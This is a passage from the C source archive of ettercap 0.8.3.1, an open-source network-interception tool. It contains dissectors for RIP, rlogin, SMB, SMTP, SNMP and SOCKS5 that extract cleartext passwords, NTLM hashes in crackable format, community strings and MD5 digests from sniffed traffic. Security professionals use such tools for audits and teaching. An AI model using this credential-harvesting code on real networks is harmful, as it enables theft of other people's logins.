+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+ * 0 | Command (1) | Version (1) | unused | * +---------------+---------------+-------------------------------+ * 4 | 0xFFFF | Authentication Type (2) | * +-------------------------------+-------------------------------+ * 8 ~ Authentication (16) ~ * +---------------------------------------------------------------+ * */ #include #include #include struct rip_hdr { u_int8 command; u_int8 version; u_int16 zero; u_int16 family; u_int16 auth_type; u_int8 auth[16]; }; #define RIP_HEADER_SIZE 4 #define RIP_AUTH_MD5_SIZE 16 #define RIP_AUTH_MD5_COMPAT_SIZE RIP_HEADER_SIZE + RIP_AUTH_MD5_SIZE struct rip_md5_info { u_int8 command; u_int8 version; u_int16 zero; u_int16 family; u_int16 auth_type; u_int16 packet_len; u_int8 keyid; u_int8 auth_len; u_int32 sequence; u_int32 reserv1; u_int32 reserv2; u_int16 afamily; u_int16 atype; u_int8 adigest[16]; }; /* protos */ FUNC_DECODER(dissector_rip); void rip_init(void); /************************************************/ /* * this function is the initializer. * it adds the entry in the table of registered decoder */ void __init rip_init(void) { dissect_add("rip", APP_LAYER_UDP, 520, dissector_rip); } FUNC_DECODER(dissector_rip) { DECLARE_DISP_PTR_END(ptr, end); char tmp[MAX_ASCII_ADDR_LEN]; struct rip_hdr *rip; int i = 0; /* don't complain about unused var */ (void)end; (void) DECODE_DATA; (void) DECODE_DATALEN; (void) DECODED_LEN; /* skip empty packets */ if (PACKET->DATA.len == 0) return NULL; DEBUG_MSG("RIP --> UDP dissector_rip"); /* cast the struct */ rip = (struct rip_hdr *)ptr; /* switch on the version */ switch(rip->version) { case 2: /* address family 0xFF Tag 2 (AUTH) */ if ( rip->family == 0xffff && ntohs(rip->auth_type) == 0x0002 ) { DEBUG_MSG("\tDissector_RIP version 2 simple AUTH"); PACKET->DISSECTOR.user = strdup("RIPv2"); PACKET->DISSECTOR.pass = strdup((char *)rip->auth); DISSECT_MSG("RIPv2 : %s:%d -> AUTH: %s \n", ip_addr_ntoa(&PACKET->L3.dst, tmp), ntohs(PACKET->L4.dst), PACKET->DISSECTOR.pass); } if ( rip->family == 0xffff && ntohs(rip->auth_type) == 0x0003 ) { /* RIP v2 MD5 authentication */ struct rip_md5_info *ripm; ripm = (struct rip_md5_info *)ptr; DEBUG_MSG("\tDissector_RIP version 2 MD5 AUTH"); if (ripm->auth_len != RIP_AUTH_MD5_SIZE && \ ripm->auth_len != RIP_AUTH_MD5_COMPAT_SIZE) { return NULL; } uint16_t rip_packet_len = ntohs(ripm->packet_len); /* validate the packet */ if (rip_packet_len > (PACKET->DATA.len - RIP_HEADER_SIZE - \ RIP_AUTH_MD5_SIZE)) { return NULL; } DISSECT_MSG("RIPv2-%s-%d:$netmd5$", ip_addr_ntoa(&PACKET->L3.dst, tmp), ntohs(PACKET->L4.dst)); for (i = 0; i < rip_packet_len + RIP_HEADER_SIZE; i++) { if (ptr + i == NULL) return NULL; DISSECT_MSG("%02x", *(ptr+i)); } DISSECT_MSG("$"); for (i = rip_packet_len + RIP_HEADER_SIZE; i < rip_packet_len + \ RIP_HEADER_SIZE + RIP_AUTH_MD5_SIZE; i++) { if (ptr + i == NULL) return NULL; DISSECT_MSG("%02x", *(ptr+i)); } DISSECT_MSG("\n"); } break; case 4: /* XXX - TODO RIP v4 */ break; } return NULL; } /* EOF */ // vim:ts=3:expandtab ettercap-0.8.3.1/src/dissectors/ec_rlogin.c000664 000000 000000 00000014235 13711276346 020545 0ustar00rootroot000000 000000 /* ettercap -- dissector RLOGIN -- TCP 512 513 514, UDP 513 These ports are the well known Unix R-Services (rexec, rlogin, rshell, rwho) Copyright (C) ALoR & NaGA This program is free software; you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation; either version 2 of the License, or (at your option) any later version. This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details. You should have received a copy of the GNU General Public License along with this program; if not, write to the Free Software Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA 02111-1307, USA. */ #include #include #include #include /* protos */ FUNC_DECODER(dissector_rlogin); void rlogin_init(void); void skip_rlogin_command(u_char **ptr, u_char *end); /************************************************/ /* * this function is the initializer. * it adds the entry in the table of registered decoder */ void __init rlogin_init(void) { dissect_add("rlogin", APP_LAYER_TCP, 512, dissector_rlogin); dissect_add("rlogin", APP_LAYER_TCP, 513, dissector_rlogin); dissect_add("rlogin", APP_LAYER_UDP, 513, dissector_rlogin); dissect_add("rlogin", APP_LAYER_TCP, 514, dissector_rlogin); } /* * rlogin sends characters one per packet for the password * but the login is sent all together on the second packet * sent by the client. */ FUNC_DECODER(dissector_rlogin) { DECLARE_DISP_PTR_END(ptr, end); struct ec_session *s = NULL; void *ident = NULL; char tmp[MAX_ASCII_ADDR_LEN]; /* don't complain about unused var */ (void) DECODE_DATA; (void) DECODE_DATALEN; (void) DECODED_LEN; /* skip messages from the server */ if (FROM_SERVER("rlogin", PACKET)) return NULL; /* skip empty packets (ACK packets) */ if (PACKET->DATA.len == 0) return NULL; DEBUG_MSG("rlogin --> TCP dissector_rlogin"); /* create an ident to retrieve the session */ dissect_create_ident(&ident, PACKET, DISSECT_CODE(dissector_rlogin)); /* this is the rlogin handshake */ if (*ptr == '\0') { /* retrieve the session */ if (session_get(&s, ident, DISSECT_IDENT_LEN) == -E_NOTFOUND) { dissect_create_session(&s, PACKET, DISSECT_CODE(dissector_rlogin)); /* remember the state (used later) */ s->data = strdup("HANDSHAKE"); /* save the session */ session_put(s); SAFE_FREE(ident); return NULL; } } /* the first packet after handshake */ if (session_get(&s, ident, DISSECT_IDENT_LEN) == E_SUCCESS && s->data) { if (!strcmp(s->data, "HANDSHAKE")) { char *localuser; char *remoteuser; localuser = (char*)ptr; /* sanity check */ if ((localuser + strlen(localuser) + 2) < (char*)end) remoteuser = localuser + strlen(localuser) + 1; else { /* bad packet, abort the collection process */ session_del(ident, DISSECT_IDENT_LEN); SAFE_FREE(ident); return NULL; } SAFE_FREE(s->data); /* make room for the string */ SAFE_CALLOC(s->data, strlen(localuser) + strlen(remoteuser) + 5, sizeof(char)); snprintf(s->data, strlen(localuser)+strlen(remoteuser) + 5, "%s (%s)\r", remoteuser, localuser); SAFE_FREE(ident); return NULL; } } /* concat the pass to the collected user */ if (session_get(&s, ident, DISSECT_IDENT_LEN) == E_SUCCESS && s->data) { size_t i, stringlen; char *p; char str[strlen(s->data) + PACKET->DATA.disp_len + 2]; memset(str, 0, sizeof(str)); /* concat the char to the previous one */ snprintf(str, strlen(s->data) + PACKET->DATA.disp_len + 2, "%s%s", (char *)s->data, ptr); /* parse the string for backspaces and erase as wanted */ stringlen = strlen(str); for (p = str, i = 0; i < stringlen; i++) { if (str[i] == '\b' || str[i] == 0x7f) { /* don't go behind str */ if (p > str) p--; } else { *p = str[i]; p++; } } *p = '\0'; /* save the new string */ SAFE_FREE(s->data); s->data = strdup(str); /* * the user input is terminated * check if it was the password by checking * the presence of \r in the string * we store "user\rpass\r" and then we split it */ if (strchr((const char*)ptr, '\r') || strchr((const char*)ptr, '\n')) { /* there is the \r and it is not the last char */ if ( ((ptr = (u_char*)strchr(s->data, '\r')) || (ptr = (u_char*)strchr(s->data, '\n'))) && ptr != s->data + strlen(s->data) - 1 ) { /* fill the structure */ PACKET->DISSECTOR.user = strdup(s->data); if ( (ptr = (u_char*)strchr((const char*)PACKET->DISSECTOR.user, '\r')) != NULL ) *ptr = '\0'; else { SAFE_FREE(PACKET->DISSECTOR.user); return NULL; } PACKET->DISSECTOR.pass = strdup((const char*)ptr + 1); if ( (ptr = (u_char*)strchr(PACKET->DISSECTOR.pass, '\r')) != NULL ) *ptr = '\0'; /* * delete the session to remember that * user and pass was collected */ session_del(ident, DISSECT_IDENT_LEN); SAFE_FREE(ident); /* display the message */ DISSECT_MSG("RLOGIN : %s:%d -> USER: %s PASS: %s\n", ip_addr_ntoa(&PACKET->L3.dst, tmp), ntohs(PACKET->L4.dst), PACKET->DISSECTOR.user, PACKET->DISSECTOR.pass); } } } SAFE_FREE(ident); return NULL; } /* EOF */ // vim:ts=3:expandtab ettercap-0.8.3.1/src/dissectors/ec_smb.c000664 000000 000000 00000034703 13711276346 020036 0ustar00rootroot000000 000000 /* ettercap -- dissector smb -- TCP 139, 445 Copyright (C) ALoR & NaGA This program is free software; you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation; either version 2 of the License, or (at your option) any later version. This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details. You should have received a copy of the GNU General Public License along with this program; if not, write to the Free Software Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA 02111-1307, USA. */ #include #include #include #include typedef struct { u_char proto[4]; u_char cmd; u_char err[4]; u_char flags1; u_short flags2; u_short pad[6]; u_short tid, pid, uid, mid; } SMB_header; typedef struct { u_char mesg; u_char flags; u_short len; } NetBIOS_header; typedef struct { u_char challenge[8]; u_char response1[24]; /* LM response OR cleartext password */ u_char response2[24]; /* NTLM respones */ #define MAX_USER_LEN 28 u_char user[MAX_USER_LEN]; u_char domain[MAX_USER_LEN]; u_char status; #define WAITING_PLAIN_TEXT 1 #define WAITING_CHALLENGE 2 #define WAITING_RESPONSE 3 #define WAITING_ENCRYPT 4 #define WAITING_LOGON_RESPONSE 5 #define LOGON_COMPLETED_OK 6 #define LOGON_COMPLETED_FAILURE 7 u_char auth_type; #define PLAIN_TEXT_AUTH 1 #define CHALLENGE_RESPONSE_AUTH 2 #define NTLMSSP_AUTH 3 } smb_session_data; #define IF_IN_PCK(x,y) if((x) >= y->packet && (x) < (y->packet + y->len) ) /* protos */ FUNC_DECODER(dissector_smb); void smb_init(void); unsigned char *GetUser(unsigned char *user, unsigned char *dest, int len); void GetBinaryE(unsigned char *binary, char *dest, int len); /************************************************/ /* * this function is the initializer. * it adds the entry in the table of registered decoder */ void __init smb_init(void) { dissect_add("smb", APP_LAYER_TCP, 139, dissector_smb); dissect_add("smb", APP_LAYER_TCP, 445, dissector_smb); } FUNC_DECODER(dissector_smb) { u_char *ptr; struct ec_session *s = NULL; smb_session_data *session_data; void *ident = NULL; SMB_header *smb; NetBIOS_header *NetBIOS; char tmp[MAX_ASCII_ADDR_LEN]; /* don't complain about unused var */ (void) DECODE_DATA; (void) DECODE_DATALEN; (void) DECODED_LEN; ptr = PACKET->DATA.data; /* Catch netbios and smb headers */ NetBIOS = (NetBIOS_header *)ptr; smb = (SMB_header *)(NetBIOS + 1); /* Let's go to the data */ ptr = (u_char *)(smb + 1); dissect_create_ident(&ident, PACKET, DISSECT_CODE(dissector_smb)); /* Is this a brand new session? */ if (session_get(&s, ident, DISSECT_IDENT_LEN) == -E_NOTFOUND) { SAFE_FREE(ident); /* Check if it's smb */ if (memcmp(smb->proto, "\xffSMB", 4) != 0) return NULL; /* Negotiate Protocol Response */ if (smb->cmd == 0x72 && FROM_SERVER("smb", PACKET)) { PACKET->DISSECTOR.banner = strdup("SMB"); /* Create the session */ dissect_create_session(&s, PACKET, DISSECT_CODE(dissector_smb)); SAFE_CALLOC(s->data, 1, sizeof(smb_session_data)); session_put(s); session_data = (smb_session_data *)s->data; /* HOOK POINT: HOOK_PROTO_SMB */ hook_point(HOOK_PROTO_SMB, PACKET); /* * Check the Security Mode * 010 (encrypted) 000 (plaintext) */ if (!(ptr[3] & 2)) { session_data->auth_type = PLAIN_TEXT_AUTH; session_data->status = WAITING_PLAIN_TEXT; } else { ptr += (*ptr) * 2; /* Last Word Field */ /* Check Encryption Key Len */ if (*ptr != 0) { ptr += 3; /* Got to Blob */ memcpy(session_data->challenge, ptr, 8); session_data->status = WAITING_ENCRYPT; session_data->auth_type = CHALLENGE_RESPONSE_AUTH; } else { /* If the challenge is not in this packet */ session_data->status = WAITING_CHALLENGE; session_data->auth_type = NTLMSSP_AUTH; } } } /* Session Setup if Negotiate Protocol has been done */ if (smb->cmd == 0x73 && FROM_CLIENT("smb", PACKET)) { ptr += ( (*ptr) * 2 + 3 ); if ( (ptr = (u_char *)memmem(ptr, 128, "NTLMSSP", 8)) == NULL) return NULL; if (ptr[8]!=1) return NULL; /* Create the session */ dissect_create_session(&s, PACKET, DISSECT_CODE(dissector_smb)); SAFE_CALLOC(s->data, 1, sizeof(smb_session_data)); session_put(s); session_data = (smb_session_data *)s->data; session_data->status = WAITING_CHALLENGE; session_data->auth_type = NTLMSSP_AUTH; /* HOOK POINT: HOOK_PACKET_SMB_CHL */ hook_point(HOOK_PROTO_SMB_CHL, PACKET); } } else { SAFE_FREE(ident); session_data = (smb_session_data *)s->data; if (FROM_CLIENT("smb", PACKET)) { if (session_data->status == LOGON_COMPLETED_OK || session_data->status == LOGON_COMPLETED_FAILURE) { /* Logon negotiation completed. It's time to dump passwords */ PACKET->DISSECTOR.user = strdup((const char*)session_data->user); /* We get domain information */ if (session_data->domain[0] != 0) { SAFE_CALLOC(PACKET->DISSECTOR.info, MAX_USER_LEN + 16, sizeof(char)); snprintf(PACKET->DISSECTOR.info, MAX_USER_LEN + 16, "DOMAIN: %s", session_data->domain); } if (session_data->auth_type == PLAIN_TEXT_AUTH) { PACKET->DISSECTOR.pass = strdup((const char*)session_data->response1); DISSECT_MSG("SMB : %s:%d -> USER: %s PASS: %s ", ip_addr_ntoa(&PACKET->L3.dst, tmp), ntohs(PACKET->L4.dst), PACKET->DISSECTOR.user, PACKET->DISSECTOR.pass); } else { char ascii_hash[256]; snprintf(ascii_hash, 40, "%s:\"\":\"\":", session_data->user); GetBinaryE(session_data->response1, ascii_hash, 24); strcat(ascii_hash, ":"); GetBinaryE(session_data->response2, ascii_hash, 24); strcat(ascii_hash, ":"); GetBinaryE(session_data->challenge, ascii_hash, 8); PACKET->DISSECTOR.pass = strdup(ascii_hash); DISSECT_MSG("SMB : %s:%d -> USER: %s HASH: %s", ip_addr_ntoa(&PACKET->L3.dst, tmp), ntohs(PACKET->L4.dst), PACKET->DISSECTOR.user, PACKET->DISSECTOR.pass); /* Call hook point when negotation is complete */ hook_point(HOOK_PROTO_SMB_CMPLT, PACKET); } if (PACKET->DISSECTOR.info!=NULL) DISSECT_MSG(" %s", PACKET->DISSECTOR.info); if (session_data->status == LOGON_COMPLETED_FAILURE) { PACKET->DISSECTOR.failed = 1; DISSECT_MSG(" (Login Failed)\n"); } else DISSECT_MSG("\n"); /* Catch multiple retries for NTLMSSP */ if (session_data->auth_type == NTLMSSP_AUTH && session_data->status == LOGON_COMPLETED_FAILURE) session_data->status = WAITING_CHALLENGE; else dissect_wipe_session(PACKET, DISSECT_CODE(dissector_smb)); return NULL; } /* Check if it's smb */ if (memcmp(smb->proto, "\xffSMB", 4) != 0) return NULL; if (smb->cmd == 0x73) { /* Session SetUp Packets */ if (session_data->status == WAITING_PLAIN_TEXT) { u_int16 pwlen, unilen; u_char *Blob; Blob = ptr; Blob += ( (*ptr) * 2 + 3 ); ptr += 15; pwlen = phtos(ptr); /* ANSI password len */ ptr += 2; unilen = phtos(ptr); /* UNICODE password len */ if (pwlen > 1) memcpy(session_data->response1, Blob, sizeof(session_data->response1) - 1); else snprintf((char*)session_data->response1, 8, "(empty)"); IF_IN_PCK(Blob, PACKET) Blob = GetUser(Blob+pwlen+unilen, session_data->user, 200); IF_IN_PCK(Blob, PACKET) GetUser(Blob, session_data->domain, 200); session_data->status = WAITING_LOGON_RESPONSE; } else if (session_data->status == WAITING_CHALLENGE) { /* HOOK POINT: HOOK_PACKET_SMB_CHL */ hook_point(HOOK_PROTO_SMB_CHL, PACKET); } else if (session_data->status == WAITING_RESPONSE) { unsigned char *Blob; /* Jump the Words */ ptr += ( (*ptr) * 2 + 3 ); /* Jump ID String */ if ( (ptr = (u_char *)memmem(ptr, 128, "NTLMSSP", 8)) == NULL) return NULL; Blob = ptr; ptr = (u_char*)strchr((const char*)ptr, 0); ptr++; if (*ptr == 3) { /* Msg Type AUTH */ u_int LM_Offset, LM_Len, NT_Offset, NT_Len, Domain_Offset, Domain_Len, User_Offset, User_Len; ptr += 4; LM_Len = *(u_int16 *)ptr; ptr += 4; LM_Offset = *(u_int32 *)ptr; ptr += 4; NT_Len = *(u_int16 *)ptr; ptr += 4; NT_Offset = *(u_int32 *)ptr; ptr += 4; Domain_Len = *(u_int16 *)ptr; ptr += 4; Domain_Offset = *(u_int32 *)ptr; ptr += 4; User_Len = *(u_int16 *)ptr; ptr += 4; User_Offset = *(u_int32 *)ptr; if (NT_Len != 24) { session_data->status = WAITING_CHALLENGE; return NULL; } IF_IN_PCK((u_char*)Blob+User_Offset, PACKET) GetUser(Blob+User_Offset, session_data->user, User_Len); IF_IN_PCK((u_char*)Blob+Domain_Offset, PACKET) GetUser(Blob+Domain_Offset, session_data->domain, Domain_Len); if (LM_Len == 24) IF_IN_PCK((u_char*)Blob+LM_Offset, PACKET) memcpy(session_data->response1, Blob+LM_Offset, 24); IF_IN_PCK((u_char*)Blob+NT_Offset, PACKET) memcpy(session_data->response2, Blob+NT_Offset, 24); session_data->status = WAITING_LOGON_RESPONSE; } } else if (session_data->status == WAITING_ENCRYPT) { unsigned char *Blob; Blob = ptr; Blob += ( (*ptr) * 2 + 3 ); memcpy(session_data->response1, Blob, 24); memcpy(session_data->response2, Blob + 24, 24); Blob = GetUser(Blob + 48, session_data->user, 200); /* Get the domain with GetUser :) */ GetUser(Blob, session_data->domain, 200); /* XXX - 5-minutes workaround for empty sessions */ if ( !memcmp(session_data->response1, "\x00\x00\x00", 3) && memcmp(session_data->response1, "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 24) ) { memset(session_data->response1, 0, 24); memset(session_data->response2, 0, 24); strncpy((char*)session_data->user, "(empty)", 8); session_data->domain[0]=0; } session_data->status = WAITING_LOGON_RESPONSE; } } } else { /* Packets coming from the server */ if (smb->cmd == 0x73) { /* Session SetUp packets */ if (session_data->status == WAITING_CHALLENGE) { ptr += ( (*ptr) * 2 + 3 ); if ( (ptr = (u_char *)memmem(ptr, 128, "NTLMSSP", 8)) == NULL) return NULL; ptr = (u_char*)strchr((const char*)ptr, 0); ptr++; if (*ptr == 2) { ptr += 16; memcpy(session_data->challenge, ptr, 8); session_data->status = WAITING_RESPONSE; } } else if (session_data->status == WAITING_LOGON_RESPONSE) { if(!memcmp(smb->err, "\x00\x00\x00\x00", 4)) session_data->status = LOGON_COMPLETED_OK; else session_data->status = LOGON_COMPLETED_FAILURE; } } } } return NULL; } /* * If the username is Unicode convert into ASCII * XXX - what about strange unicode charsets??? */ unsigned char *GetUser(unsigned char *user, unsigned char *dest, int len) { char Unicode = 1; int i = 0; /* Skip 0 padding for odd unicode chars */ if (user[0] == 0) user++; /* Does anyone uses 2 chars users? I think it's unicode */ if (user[1] == 0) Unicode = 2; while(*user != 0 && i < (MAX_USER_LEN - 1) && len > 0) { *dest = *user; dest++; i++; len -= Unicode; user += Unicode; } if (*user == 0) user += Unicode; *dest = 0; return user; } /* Convert and attach a binary array to ASCII chars */ void GetBinaryE(unsigned char *binary, char *dest, int blen) { char dummy[5]; for (; blen > 0; blen--) { snprintf( dummy, 3, "%02X", *binary); binary++; strcat(dest, dummy); } } /* EOF */ // vim:ts=3:expandtab ettercap-0.8.3.1/src/dissectors/ec_smtp.c000664 000000 000000 00000012521 13711276346 020232 0ustar00rootroot000000 000000 /* ettercap -- dissector SMTP -- TCP 25 Copyright (C) ALoR & NaGA This program is free software; you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation; either version 2 of the License, or (at your option) any later version. This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details. You should have received a copy of the GNU General Public License along with this program; if not, write to the Free Software Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA 02111-1307, USA. */ #include #include #include #include #include /* protos */ FUNC_DECODER(dissector_smtp); void smtp_init(void); /************************************************/ /* * this function is the initializer. * it adds the entry in the table of registered decoder */ void __init smtp_init(void) { dissect_add("smtp", APP_LAYER_TCP, 25, dissector_smtp); sslw_dissect_add("ssmtp", 465, dissector_smtp, SSL_ENABLED); } FUNC_DECODER(dissector_smtp) { DECLARE_DISP_PTR_END(ptr, end); struct ec_session *s = NULL; void *ident = NULL; char tmp[MAX_ASCII_ADDR_LEN]; /* don't complain about unused var */ (void) DECODE_DATA; (void) DECODE_DATALEN; (void) DECODED_LEN; /* the connection is starting... create the session */ CREATE_SESSION_ON_SYN_ACK("smtp", s, dissector_smtp); CREATE_SESSION_ON_SYN_ACK("ssmtp", s, dissector_smtp); /* check if it is the first packet sent by the server */ IF_FIRST_PACKET_FROM_SERVER_SSL("smtp", "ssmtp", s, ident, dissector_smtp) { DEBUG_MSG("\tdissector_smtp BANNER"); /* * get the banner * ptr + 4 to skip the initial 220 response */ if (!strncmp((const char*)ptr, "220", 3)) { PACKET->DISSECTOR.banner = strdup((const char*)ptr + 4); /* remove the \r\n */ if ( (ptr = (u_char*)strchr(PACKET->DISSECTOR.banner, '\r')) != NULL ) *ptr = '\0'; } } ENDIF_FIRST_PACKET_FROM_SERVER(s, ident) /* skip messages coming from the server */ if (FROM_SERVER("smtp", PACKET) || FROM_SERVER("ssmtp", PACKET)) return NULL; /* skip empty packets (ACK packets) */ if (PACKET->DATA.len == 0) return NULL; DEBUG_MSG("SMTP --> TCP dissector_smtp"); /* skip the number, move to the command */ while(*ptr == ' ' && ptr != end) ptr++; /* reached the end */ if (ptr == end) return NULL; /* * AUTH LOGIN * * digest(user) * digest(pass) * * the digests are in base64 */ if ( !strncasecmp((const char*)ptr, "AUTH LOGIN", 10) ) { DEBUG_MSG("\tDissector_smtp AUTH LOGIN"); /* destroy any previous session */ dissect_wipe_session(PACKET, DISSECT_CODE(dissector_smtp)); /* create the new session */ dissect_create_session(&s, PACKET, DISSECT_CODE(dissector_smtp)); /* remember the state (used later) */ s->data = strdup("AUTH"); /* save the session */ session_put(s); /* username is in the next packet */ return NULL; } /* search the session (if it exist) */ dissect_create_ident(&ident, PACKET, DISSECT_CODE(dissector_smtp)); if (session_get(&s, ident, DISSECT_IDENT_LEN) == -E_NOTFOUND) { SAFE_FREE(ident); return NULL; } SAFE_FREE(ident); /* the session is invalid */ if (s->data == NULL) { dissect_wipe_session(PACKET, DISSECT_CODE(dissector_smtp)); return NULL; } if (!strcmp((const char*)s->data, "AUTH")) { char *user; int i; DEBUG_MSG("\tDissector_smtp AUTH LOGIN USER"); SAFE_CALLOC(user, strlen((const char*)ptr), sizeof(char)); /* username is encoded in base64 */ i = base64decode((const char*)ptr, &user); SAFE_FREE(s->data); /* store the username in the session */ SAFE_CALLOC(s->data, strlen("AUTH USER ") + i + 1, sizeof(char) ); snprintf(s->data, strlen("AUTH USER ") + i + 1, "AUTH USER %s", user); SAFE_FREE(user); /* pass is in the next packet */ return NULL; } if (!strncmp(s->data, "AUTH USER", 9)) { char *pass; DEBUG_MSG("\tDissector_smtp AUTH LOGIN PASS"); SAFE_CALLOC(pass, strlen((const char*)ptr), sizeof(char)); /* password is encoded in base64 */ base64decode((const char*)ptr, &pass); /* fill the structure */ PACKET->DISSECTOR.user = strdup(s->data + strlen("AUTH USER ")); PACKET->DISSECTOR.pass = strdup(pass); SAFE_FREE(pass); /* destroy the session */ dissect_wipe_session(PACKET, DISSECT_CODE(dissector_smtp)); /* print the message */ DISSECT_MSG("SMTP : %s:%d -> USER: %s PASS: %s\n", ip_addr_ntoa(&PACKET->L3.dst, tmp), ntohs(PACKET->L4.dst), PACKET->DISSECTOR.user, PACKET->DISSECTOR.pass); return NULL; } return NULL; } /* EOF */ // vim:ts=3:expandtab ettercap-0.8.3.1/src/dissectors/ec_snmp.c000664 000000 000000 00000007467 13711276346 020241 0ustar00rootroot000000 000000 /* ettercap -- dissector snmp -- UDP 161 Copyright (C) ALoR & NaGA This program is free software; you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation; either version 2 of the License, or (at your option) any later version. This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details. You should have received a copy of the GNU General Public License along with this program; if not, write to the Free Software Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA 02111-1307, USA. */ #include #include #include #include #define ASN1_INTEGER 2 #define ASN1_STRING 4 #define ASN1_SEQUENCE 16 #define SNMP_VERSION_1 0 #define SNMP_VERSION_2c 1 #define SNMP_VERSION_2u 2 #define SNMP_VERSION_3 3 #define MAX_COMMUNITY_LEN 128 /* protos */ FUNC_DECODER(dissector_snmp); void snmp_init(void); /************************************************/ /* * this function is the initializer. * it adds the entry in the table of registered decoder */ void __init snmp_init(void) { dissect_add("snmp", APP_LAYER_UDP, 161, dissector_snmp); } FUNC_DECODER(dissector_snmp) { DECLARE_DISP_PTR_END(ptr, end); size_t clen = 0; char tmp[MAX_ASCII_ADDR_LEN]; u_int32 version, n; /* don't complain about unused var */ (void) DECODE_DATA; (void) DECODE_DATALEN; (void) DECODED_LEN; /* skip empty packets (ACK packets) */ if (PACKET->DATA.len == 0) return NULL; DEBUG_MSG("SNMP --> UDP dissector_snmp"); /* get the version */ while (*ptr++ != ASN1_INTEGER && ptr < end); /* reached the end */ if (ptr >= end) return NULL; // Check len + version if ((ptr + (*ptr) + 1) >= end) return NULL; /* move to the len */ ptr += *ptr; /* get the version */ version = *ptr++; /* convert the code to the real version */ if (version++ == 3) version = 2; else if (version > 3) version = 3; /* move till the community name len */ while(*ptr++ != ASN1_STRING && ptr < end); /* reached the end */ if (ptr >= end) return NULL; /* get the community name length */ n = *ptr; if (n >= 128) { n &= ~128; if ((ptr + n) > end) return NULL; ptr += n; switch(*ptr) { case 1: clen = *ptr; break; case 2: NS_GET16(clen, ptr); break; case 3: ptr--; NS_GET32(clen, ptr); clen &= 0xfff; break; case 4: NS_GET32(clen, ptr); break; } } else clen = *ptr; /* update the pointer */ ptr++; /* Avoid bof */ if (clen > MAX_COMMUNITY_LEN || ((ptr + clen) > end)) return NULL; SAFE_CALLOC(PACKET->DISSECTOR.user, clen + 2, sizeof(char)); /* fill the structure */ snprintf(PACKET->DISSECTOR.user, clen + 1, "%s", ptr); PACKET->DISSECTOR.pass = strdup(" "); PACKET->DISSECTOR.info = strdup("SNMP v "); /* put the number in the string */ PACKET->DISSECTOR.info[6] = version + 48; DISSECT_MSG("SNMP : %s:%d -> COMMUNITY: %s INFO: %s\n", ip_addr_ntoa(&PACKET->L3.dst, tmp), ntohs(PACKET->L4.dst), PACKET->DISSECTOR.user, PACKET->DISSECTOR.info); return NULL; } /* EOF */ // vim:ts=3:expandtab ettercap-0.8.3.1/src/dissectors/ec_socks.c000664 000000 000000 00000010605 13711276346 020372 0ustar00rootroot000000 000000 /* ettercap -- dissector SOCKS5 -- TCP 1080 Copyright (C) ALoR & NaGA This program is free software; you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation; either version 2 of the License, or (at your option) any later version. This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details. You should have received a copy of the GNU General Public License along with this program; if not, write to the Free Software Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA 02111-1307, USA. */ #include #include #include #include /* protos */ FUNC_DECODER(dissector_socks); void socks_init(void); #define USER_PASS 0x02 #define NO_AUTH 0x00 /************************************************/ /* * this function is the initializer. * it adds the entry in the table of registered decoder */ void __init socks_init(void) { dissect_add("socks", APP_LAYER_TCP, 1080, dissector_socks); } FUNC_DECODER(dissector_socks) { DECLARE_DISP_PTR_END(ptr, end); struct ec_session *s = NULL; void *ident = NULL; char tmp[MAX_ASCII_ADDR_LEN]; u_int16 d_len; /* We don't want heap overflows :) */ /* don't complain about unused var */ (void)end; (void) DECODE_DATA; (void) DECODE_DATALEN; (void) DECODED_LEN; /* Skip ACK packets */ if (PACKET->DATA.len == 0) return NULL; /* Check the version */ if (ptr[0] != 0x05) return NULL; /* Packets coming from the server */ if (FROM_SERVER("socks", PACKET)) { /* Is this an auth-scheme accept message? */ if (PACKET->DATA.len != 2) return NULL; DEBUG_MSG("\tdissector_socks BANNER"); PACKET->DISSECTOR.banner = strdup("socks v5"); /* If the server didn't accepted user/pass scheme */ if (ptr[1] != USER_PASS && ptr[1] != NO_AUTH) return NULL; dissect_create_ident(&ident, PACKET, DISSECT_CODE(dissector_socks)); /* if the session does not exist... */ if (session_get(&s, ident, DISSECT_IDENT_LEN) == -E_NOTFOUND) { /* create the new session */ dissect_create_session(&s, PACKET, DISSECT_CODE(dissector_socks)); if (ptr[1] == NO_AUTH) s->data = strdup("NO AUTH"); session_put(s); } } else { /* Packets coming from the client */ dissect_create_ident(&ident, PACKET, DISSECT_CODE(dissector_socks)); /* Only if the server accepted user/pass scheme */ if (session_get(&s, ident, DISSECT_IDENT_LEN) == E_SUCCESS) { DEBUG_MSG("\tDissector_socks USER/PASSWORD"); /* No Auth required */ if (s->data) { PACKET->DISSECTOR.user = strdup("SOCKSv5"); PACKET->DISSECTOR.pass = strdup("No auth required"); DISSECT_MSG("SOCKS5 : %s:%d -> No Auth Required\n", ip_addr_ntoa(&PACKET->L3.dst, tmp), ntohs(PACKET->L4.dst)); } else { /* User/pass */ /* Username len */ d_len = *(++ptr); /* Save the username (take care of the null termination) */ SAFE_CALLOC(PACKET->DISSECTOR.user, 